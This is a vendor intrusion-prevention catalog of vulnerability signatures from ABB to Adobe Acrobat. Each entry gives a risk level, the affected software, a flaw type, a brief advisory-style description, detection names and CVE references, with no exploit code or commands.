Detected Vulnerabilities and Situations in sgpkg-ips-1873-5242

File-Text_ABB-Test-Signal-Viewer-Cwgraph3d-ActiveX-Arbitrary-File-Creation

References:

CVE-2019-7232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7232

ABB-Test-Signal-Viewer-Cwgraph3d-ActiveX-Arbitrary-File-Creation

About this vulnerability:

A vulnerability in ABB Test Signal Viewer

Risk:

Moderate

First detected in:

sgpkg-ips-554-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ABB Test Signal Viewer; ABB RobotWare

Type:

Directory Traversal

Description:

An arbitrary file writing vulnerability exists in ABB Test Signal Viewer. The vulnerability is due to a directory traversal error in the exposed insecure method ExportStyle by the included CWGraph3D (cw3dgrph.ocx) ActiveX control. An attacker could exploit this vulnerability by enticing the target user to open a malicious web page or to view a malicious document. Successful exploitation would allow an attacker to create arbitrary files with attacker-controlled contents on the target machine.

Situation:

References:

CVE-2013-5022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5022

OSVDB-96160
http://www.osvdb.org/96160

ABetterInternet

About this vulnerability:	ABetterInternet browser plugin
Risk:	Low
First detected in:	sgpkg-ips-33-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ABetterInternet
Type:	Insecure Configuration
Description:	ABetterInternet is a browser plugin for Internet Explorer. Some organizations may consider this unwanted software. This plugin displays advertisement popups and/or sends information about the browsing habits of its user. It may even install third party software and can update itself without user action.
Situation:	HTTP_CSH-ABetterInternet HTTP_CSH-Transponder

ABUS-TVIP-20000-21150-Security-Camera-Command-Injection-CVE-2023-26609

About this vulnerability:

A vulnerability in ABUS TVIP 20000-21150 security cameras

Risk:

High

First detected in:

sgpkg-ips-1658-5242

Last changed:

sgpkg-ips-1658-5242

Platform:

Generic

Software:

ABUS TVIP

Type:

Input Validation

Description:

A command injection vulnerability has been reported in ABUS TVIP 20000-21150 security cameras. A remote attacker can exploit this vulnerability to execute arbitrary commands via shell metacharacters in the value of the ap parameter.

Situation:

HTTP_CRL-ABUS-TVIP-20000-21150-Security-Camera-Command-Injection-CVE-2023-26609

References:

CVE-2023-26609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26609

ABUS-TVIP-20000-21150-Security-Camera-Local-File-Inclusion

About this vulnerability:	A vulnerability in ABUS TVIP 20000-21150 security cameras
Risk:	High
First detected in:	sgpkg-ips-1658-5242
Last changed:	sgpkg-ips-1658-5242
Platform:	Generic
Software:	ABUS TVIP
Type:	Malfunction
Description:	A local file inclusion vulnerability has been reported in ABUS TVIP 20000-21150 security cameras. A remote attacker can exploit this vulnerability to read any file on the system, which may reveal passwords and other sensitive information.
Situation:	HTTP_CSU-ABUS-TVIP-20000-21150-Security-Camera-Local-File-Inclusion

Abyss-Web-Server-HTTP-Get-BOF

About this vulnerability:

Heap overrun vulnerability in Abyss web server

Risk:

High

First detected in:

sgpkg-ips-14-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Abyss Web Server

Type:

Buffer Overflow

Description:

Abyss Web Server is vulnerable to a heap buffer overflow. By sending a specially-crafted HTTP GET request appended with a colon and a backslash (:\) character a remote attacker can overflow a buffer and execute arbitrary code on the system with privileges of the Abyss Web Server user.

Situation:

HTTP_CSU-Abyss-Web-Server-HTTP-Get-BOF

References:

BID-8062
http://www.securityfocus.com/bid/8062

Accellion-FTA-oauth_token-Remote-Command-Execution

About this vulnerability:

Accellion FTA oauth_token Remote Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-685-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Accellion

Type:

Script Injection

Description:

A remote shell command execution vulnerability exists in Accellion, versions FTA_9_11_200 and before, that allows for remote command execution due to insufficient sanitization of the 'oauth_token' parameter.

Situation:

HTTP_CRL-Accellion-FTA-oauth_token-Remote-Command-Execution

References:

CVE-2015-2857
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2857

Accellion-FTA-statecode-Cookie-Remote-File-Disclosure

About this vulnerability:

Accellion FTA statecode Cookie Remote File Disclosure vulnerability.

Risk:

High

First detected in:

sgpkg-ips-685-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Accellion

Type:

Input Validation

Description:

A remote file disclosure vulnerability exists in Accellion, versions FTA_9_11_200 and before, that allows remote attackers to disclose the contents of any file readable by the webserver, due to the insufficient sanitization of the 'statecode' cookie.

Situation:

HTTP_CS-Accellion-FTA-statecode-Cookie-Remote-File-Disclosure

References:

CVE-2015-2856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2856

ACDSee-Products-XPM-Values-Section-Buffer-Overflow

About this vulnerability:

A vulnerability in ACDSee Systems ACDSee Photo Editor

Risk:

Moderate

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ACDSee

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in multiple ACDSee products. The flaw is due to a boundary error when processing crafted XPM files. A remote attacker can exploit this vulnerability by persuading the target user to open a malicious XPM file with the affected application. Successful attack could allow for arbitrary code being injected and executed with the privileges of the currently logged on user. In an attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the currently logged in user. In an attack case where code injection is not successful, the vulnerable application will terminate abnormally.

Situation:

File-TextId_ACDSee-Products-XPM-Values-Section-Buffer-Overflow

References:

CVE-2007-6009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6009

BID-26554
http://www.securityfocus.com/bid/26554

OSVDB-45278
http://www.osvdb.org/45278

ACDSee-XBM-Header-Name-Buffer-Overflow

About this vulnerability:	A vulnerability in ACD Systems ACDSee Photo Editor
Risk:	High
First detected in:	sgpkg-ips-274-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ACDSee Photo Editor; ACDSee
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in various applications in the ACDSee product family. The flaw is due to a boundary error when processing crafted X Bitmap Graphic (XBM) files. A remote unauthenticated attacker can exploit this vulnerability by persuading the target user to open a malicious XBM file with the affected application. A successful attack allows arbitrary code injection and execution with the privileges of the currently logged on user.
Situation:	HTTP_SS-ACDSee-XBM-Header-Name-Buffer-Overflow File-TextId_ACDSee-XBM-Header-Name-Buffer-Overflow

ACDSee-XPM-File-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in XPM file parsing in ACDSee

Risk:

High

First detected in:

sgpkg-ips-108-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

ACDSee; ACDSee Photo Editor; ACDSee Pro

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in ACD Systems' ACDSee products. The vulnerability is due to improper boundary validation when processing XPM images. The flaw can be leveraged remotely to execute arbitrary code under the context of the currently logged-in user.

Situation:

HTTP_ACDSee-XPM-File-Handling-Buffer-Overflow
File-TextId_ACDSee-XPM-File-Handling-Buffer-Overflow

References:

CVE-2007-2193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2193

BID-23620
http://www.securityfocus.com/bid/23620

OSVDB-35236
http://www.osvdb.org/35236

ACGVclick-Php-Remote-File-Include-Vulnerability

About this vulnerability:

ACGVclick Remote File Include Vulnerability

Risk:

High

First detected in:

sgpkg-ips-343-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ACGVclick

Type:

Input Validation

Description:

The ACGVclick is prone to a remote file-include vulnerability. Successful exploitation of the issue allows the attacker to compromise the application and the remote system.

Situation:

HTTP_CRL-ACGVclick-Remote-Code-Injection-Compromise

References:

CVE-2007-0577
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0577

BID-22278
http://www.securityfocus.com/bid/22278

OSVDB-33002
http://www.osvdb.org/33002

Acquia-Mautic-Tracking-Pixel-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Mautic.

Risk:

High

First detected in:

sgpkg-ips-1479-5242

Last changed:

sgpkg-ips-1479-5242

Platform:

Generic

Software:

Mautic

Type:

Input Validation

Description:

A vulnerability in Mautic, versions prior to 4.3.0, which allows remote attackers to execute arbitrary scripts, due to the improper sanitization of user metadata collected from tracking pixels.

Situation:

HTTP_CS-Acquia-Mautic-Tracking-Pixel-Stored-Cross-Site-Scripting

References:

CVE-2022-25772
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25772

Acrobat-Reader-eBook-Plug-In-Format-String

About this vulnerability:

A vulnerability in Acrobat Reader

Risk:

High

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Format String

Description:

A vulnerability exists within the EBX Transfer Data (ETD) file parser of the eBook plug-in component of Adobe Acrobat Reader. The ETD file parser contains a flaw where user input can be used as the format string in an output function, potentially causing memory corruption. This vulnerability can be leveraged by an attacker to remotely inject and execute code on a target system with the privileges of the currently logged in user.

Situation:

File-TextId_Acrobat-Reader-eBook-Plug-In-Format-String

References:

CVE-2004-1153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1153

BID-11934
http://www.securityfocus.com/bid/11934

Acronis-Cyber-Infrastructure-Default-Password-RCE

About this vulnerability:

A vulnerability in Acronis Cyber Infrastructure

Risk:

High

First detected in:

sgpkg-ips-1808-5242

Last changed:

sgpkg-ips-1808-5242

Platform:

Unix; Linux

Software:

Acronis Cyber Infrastructure

Type:

Insecure Configuration

Description:

A vulnerability in Acronis Cyber Infrastructure, multiple versions, which allows remote attackers to execute arbitrary code by use of default passwords.

Situation:

Generic_CS-Acronis-Cyber-Infrastructure-Default-Password-RCE

References:

CVE-2023-45249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45249

Acronis-Cyber-Protect-Backup-Remote-Code-Execution

About this vulnerability:

A vulnerability in Acronis Cyber Protect or Backup

Risk:

High

First detected in:

sgpkg-ips-1808-5242

Last changed:

sgpkg-ips-1808-5242

Platform:

Linux; Windows

Software:

Acronis Cyber Protect or Backup

Type:

Input Validation

Description:

A vulnerability in ronis Cyber Protect or Backup, versions Acronis Cyber Protect 15 before 29486, and Backup 12.5 before 16545, which allows remote attackers to attain bearer tokens through anonymous registration of new protect/backup agents on new endpoints, which can be used in the web console, allowing the ability for remote code execution.

Situation:

HTTP_CRL-Acronis-Cyber-Protect-Backup-Remote-Code-Execution

References:

CVE-2022-3405
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3405

ACTi-ASOC-2200-Web-Configurator-Remote-Root-Command-Execution

About this vulnerability:	A vulnerability in ACTi ASOC 2200 Web Configurator
Risk:	High
First detected in:	sgpkg-ips-607-5211
Last changed:	sgpkg-ips-1639-5242
Platform:	Generic
Software:	ACTi ASOC 2200 Web Configurator
Type:	Malfunction
Description:	There is a remote root command execution vulnerability in ACTi ASOC 2200 Web Configurator.
Situation:	HTTP_CSU-Potential-System-File-Disclosure HTTP_CSU-Suspected-System-File-Disclosure

Actionscript-Security-Bypass-Vulnerability-CVE-2016-4139

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in ActionScript.

Situation:

File-Text_Actionscript-Security-Bypass-Vulnerability-CVE-2016-4139

References:

CVE-2016-4139
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4139

Active-Collab-Remote-PHP-Code-Injection

About this vulnerability:

An Active Collab Remote PHP Code Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Active Collab

Type:

Input Validation

Description:

A vulnerability in Active Collab, versions 2.3.8 and earlier, that allows remote attackers to inject and execute PHP code due to the lack of user input validation.

Situation:

HTTP_CRL-Active-Collab-Remote-PHP-Code-Injection

References:

CVE-2012-6554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6554

BID-53624
http://www.securityfocus.com/bid/53624

OSVDB-81966
http://www.osvdb.org/81966

ActiveX-Object-Obfuscated-Content

About this vulnerability:	An attempt to exploit a vulnerability in Internet Explorer via ActiveX Object Obfuscated Content detected.
Risk:	High
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Internet Explorer
Type:	Browser
Description:	A vulnerability with Internet Explorer has been detected within obfuscated ActiveX content.
Situation:	File-Text_ActiveX-Object-Obfuscated-Content

Actualscripts-Actualanalyzer-Cookie-Command-Execution

About this vulnerability:

A vulnerability in ActualScripts ActualAnalyzer Lite

Risk:

High

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ActualScripts ActualAnalyzer Lite

Type:

Input Validation

Description:

A command execution vulnerability exists in ActualAnalyzer. The vulnerability is due to insufficient input validation when handling cookie values. The cookie values can be passed to a PHP eval() function which can allow command execution. A remote unauthenticated attacker can exploit this vulnerability by sending an HTTP request with a crafted cookie value. Successful exploitation could result in command execution on the operating system from which the application is being run.

Situation:

HTTP_CSH-Actualscripts-Actualanalyzer-Cookie-Command-Execution

References:

OSVDB-110601
http://www.osvdb.org/110601

ActXax-Raw-Server-Buffer-Overflow

About this vulnerability:

A vulnerability in ActFax ActFax Server

Risk:

Moderate

First detected in:

sgpkg-ips-520-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ActFax Server

Type:

Buffer Overflow

Description:

There are multiple buffer overflow vulnerabilities in ActFax RAW Server. These vulnerabilities are caused by insufficient bounds checking while processing certain fields. By sending crafted messages to the target server, a remote unauthenticated attacker can exploit these vulnerabilities to execute arbitrary code with the privileges of the vulnerable server. If code execution is unsuccessful, the service may terminate abnormally.

Situation:

Generic_CS-ActFax-Raw-Server-Buffer-Overflow

References:

BID-57789
http://www.securityfocus.com/bid/57789

OSVDB-89944
http://www.osvdb.org/89944

Acunetix-Vulnerability-Scanner-Usage

About this vulnerability:	Detects vulnerability scanner usage
Risk:	Moderate
First detected in:	sgpkg-ips-481-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	Acunetix vulnerability scanner usage was detected
Situation:	HTTP_CSH-Acunetix-Vulnerability-Scanner-Usage

Adbopebot-Trojan

About this vulnerability:	Adbopebot Trojan
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Linux
Software:	<os>
Type:	Code Injection
Description:	Adbopebot is a trojan that affects ARM architecture Android/Linux systems.
Situation:	Generic_CS-Adbopebot-Trojan

Adload-Command-And-Control-Traffic

About this vulnerability:	AdLoad command and control traffic
Risk:	High
First detected in:	sgpkg-ips-1622-5242
Last changed:	sgpkg-ips-1622-5242
Platform:	Mac OS
Software:	<os>
Type:	Backdoor
Description:	AdLoad is a macOS malware with capabilities to deliver further malicious payloads.
Situation:	HTTP_CSH-Adload-Command-And-Control-Traffic

Adminer-Remote-Arbitrary-File-Read-CVE-2021-43008

About this vulnerability:

An attempt to exploit a vulnerability in Adminer detected

Risk:

High

First detected in:

sgpkg-ips-1842-5242

Last changed:

sgpkg-ips-1842-5242

Platform:

Generic

Software:

Adminer

Type:

Input Validation

Description:

Improper access control in Adminer versions 1.12.0 to 4.6.2 allows an attacker to achieve arbitrary file read on the server by requesting the Adminer to connect to a remote MySQL database controlled by the attacker.

Situation:

HTTP_CRL-Adminer-Remote-Arbitrary-File-Read-CVE-2021-43008

References:

CVE-2021-43008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43008

Adobe-Acrobat--Embedded-JBIG2-Stream-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Adobe Systems Acrobat

Risk:

High

First detected in:

sgpkg-ips-209-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Adobe Reader and Adobe Acrobat. The vulnerability is due to insufficient input validation when processing embedded JBIG2 streams. A remote attacker can exploit this vulnerability by enticing the target user to open malicious PDF files, and it may lead to arbitary code execution in the context of the current user.

Situation:

HTTP_SS-Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow
HTTP_SS-Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow-2
File-PDF_Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow
File-PDF_Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow-2

References:

CVE-2009-0658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0658

BID-33751
http://www.securityfocus.com/bid/33751

OSVDB-52073
http://www.osvdb.org/52073

Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Addfield-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems Acrobat Reader

Risk:

High

First detected in:

sgpkg-ips-1370-5242

Last changed:

sgpkg-ips-1370-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

A use-after-free vulnerability has been reported in Adobe Acrobat and Acrobat Reader DC. The vulnerability is due to improper handling of exceptions during a call to the JavaScript addField method. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted PDF file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.

Situation:

File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Addfield-Use-After-Free

References:

CVE-2021-28635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28635

Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-buttonGetIcon-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Acrobat

Risk:

High

First detected in:

sgpkg-ips-1388-5242

Last changed:

sgpkg-ips-1388-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

A use after free vulnerability has been reported in Adobe Acrobat and Acrobat Reader DC. The vulnerability is due to improper handling of button form fields in calls to the buttonGetIcon method. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted PDF file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.

Situation:

File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-buttonGetIcon-Use-After-Free

References:

CVE-2021-39836
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39836

Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Deleteitemat-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Acrobat

Risk:

High

First detected in:

sgpkg-ips-1392-5242

Last changed:

sgpkg-ips-1392-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

Two use after free vulnerabilities, CVE-2021-39839 and CVE-2021-39837, have been reported in Adobe Acrobat and Acrobat Reader DC. The vulnerabilities are due to improper handling of list box form fields in calls to the deleteItemAt and getItemAt methods. A remote attacker can exploit these vulnerabilities by enticing a target user into opening a crafted PDF file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.

Situation:

File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Deleteitemat-Use-After-Free

References:

CVE-2021-39837
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39837

Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Field-Format-Action-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Acrobat

Risk:

High

First detected in:

sgpkg-ips-1396-5242

Last changed:

sgpkg-ips-1396-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

A use after free vulnerability has been reported in Adobe Acrobat and Acrobat Reader DC. The vulnerability is due to improper handling of form fields during the execution of field format actions. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted PDF file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.

Situation:

File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Field-Format-Action-Use-After-Free

References:

CVE-2021-39840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39840

Adobe-Acrobat-And-Acrobat-Reader-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat DC

Risk:

Moderate

First detected in:

sgpkg-ips-1330-5242

Last changed:

sgpkg-ips-1330-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Buffer Overflow

Description:

There exists a heap-based buffer overflow vulnerability in Adobe Acrobat and Acrobat Reader. Successful exploitation could lead in arbitrary code execution.

Situation:

File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Heap-Buffer-Overflow

References:

CVE-2021-21017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21017

Adobe-Acrobat-And-Acrobat-Reader-Information-Disclosure

About this vulnerability:

A vulnerability in Adobe Acrobat DC

Risk:

Moderate

First detected in:

sgpkg-ips-1313-5242

Last changed:

sgpkg-ips-1313-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in Adobe Acrobat and Acrobat Reader. The vulnerability is due to a lack of user confirmation before performing DNS lookups when certain JavaScript functions are invoked. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted PDF document. Successful exploitation results in a DNS lookup for an attacker controlled domain, disclosing that the PDF has been opened, closed, or some other action has been taken.

Situation:

File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Information-Disclosure

References:

CVE-2020-29075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29075

Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow

About this vulnerability:

An integer overflow vulnerability in Adobe Acrobat and Adobe Reader products

Risk:

High

First detected in:

sgpkg-ips-261-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Adobe Acrobat; Adobe Reader

Type:

Integer Overflow

Description:

There is an integer overflow vulnerability in Adobe Acrobat and Adobe Reader products. A remote attacker can exploit this vulnerability by enticing a target user to open malformed PDF files.

Situation:

E-Mail_BS-Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
HTTP_SS-Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow-2
HTTP_SS-Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
File-PDF_Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
File-PDF_Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow-2

References:

CVE-2009-3459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3459

BID-36600
http://www.securityfocus.com/bid/36600

OSVDB-58729
http://www.osvdb.org/58729

Adobe-Acrobat-And-Adobe-Reader-Plugin-Object-Reloading-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in the Adobe PDF plugin for Firefox web browser

Risk:

High

First detected in:

sgpkg-ips-261-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

There is a memory corruption vulnerability in the Adobe PDF plugin for the Firefox web browser. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious web page in a Firefox web browser that has the vulnerable plugin installed. Successful exploitation causes a memory corruption that may lead to arbitrary code execution with the privileges of the logged in user, or terminate the application abnormally.

Situation:

HTTP_SS-Adobe-Acrobat-And-Adobe-Reader-Plugin-Object-Reloading-Memory-Corruption
File-Text_Adobe-Acrobat-And-Reader-Plugin-Object-Reloading-Memory-Corruption

References:

CVE-2009-2983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2983

BID-36668
http://www.securityfocus.com/bid/36668

OSVDB-58913
http://www.osvdb.org/58913

Adobe-Acrobat-And-Adobe-Reader-U3D-Rhadobemeta-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat Professional

Risk:

Moderate

First detected in:

sgpkg-ips-625-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Adobe Reader and Acrobat. The vulnerability is due to the way of Adobe Acrobat and Adobe Reader handle U3D data. A remote attacker can exploit this vulnerability by enticing the target user to open malicious PDF files. In an attack case where code injection is not successful, the affected Acrobat application parsing the malicious PDF document can terminate abnormally. In a more sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user.

Situation:

File-PDF_Adobe-Acrobat-And-Adobe-Reader-U3D-Rhadobemeta-Buffer-Overflow

References:

CVE-2009-1855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1855

BID-35282
http://www.securityfocus.com/bid/35282

Adobe-Acrobat-And-Reader-Acroform-Encoding-Code-Execution

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-998-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Input Validation

Description:

Improper parsing of PDF elements causes a code execution vulnerability in Adobe Acrobat.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-Acroform-Encoding-Code-Execution

References:

CVE-2017-11263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11263

Adobe-Acrobat-And-Reader-Acroform-Font-Encoding-Code-Execution

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1019-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Input Validation

Description:

Improper handling of an encoding dictionary in a PDF file causes a vulnerability in Adobe Acrobat. A successful exploitation allows an attacker to execute arbitrary code with the privileges of the affected process.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-Acroform-Font-Encoding-Code-Execution

References:

CVE-2017-16415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16415

Adobe-Acrobat-And-Reader-Acroform-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2015

Risk:

Moderate

First detected in:

sgpkg-ips-1250-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Incorrect string handling causes a use after free vulnerability in Adobe Acrobat. A successful exploit may allow an attacker to execute arbitrary code in with the privileges of the affected process.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-Acroform-Use-After-Free

References:

CVE-2020-3805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3805

Adobe-Acrobat-And-Reader-Addannot-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-975-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

A user after free vulnerability in Adobe Systems Acrobat 2017 allows a remote attacker to execute arbitrary code on the target system by means of a crafted document file.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-Addannot-Use-After-Free

References:

CVE-2017-11254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11254

Adobe-Acrobat-And-Reader-Dc-Acroform-Buttongetcaption-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017 (Classic)

Risk:

Moderate

First detected in:

sgpkg-ips-1389-5242

Last changed:

sgpkg-ips-1389-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper handling of button form fields in calls to the buttonGetCaption method causes a use after free vulnerability in Adobe Acrobat. A successful exploit allows an attacker to execute code with the privileges of the target process.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-Dc-Acroform-Buttongetcaption-Use-After-Free

References:

CVE-2021-39838
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39838

Adobe-Acrobat-And-Reader-Docid-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1049-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Buffer Overflow

Description:

There has been reported a stack buffer overflow vulnerability in Adobe Acrobat and Acrobat Reader. This vulnerability could be exploited by having a target user open a crafted webpage or a maliciously crafted document.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-Docid-Stack-Buffer-Overflow

References:

CVE-2018-4901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4901

Adobe-Acrobat-And-Reader-Escript-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2015

Risk:

Moderate

First detected in:

sgpkg-ips-1248-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper string handling causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit may allow an attacker to gain access to sensitive information on the target system.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-Escript-Out-Of-Bounds-Read

References:

CVE-2020-3804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3804

Adobe-Acrobat-And-Reader-Font-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Integer Overflow

Description:

A code execution vulnerability exists in Adobe Acrobat and Reader.

Situation:

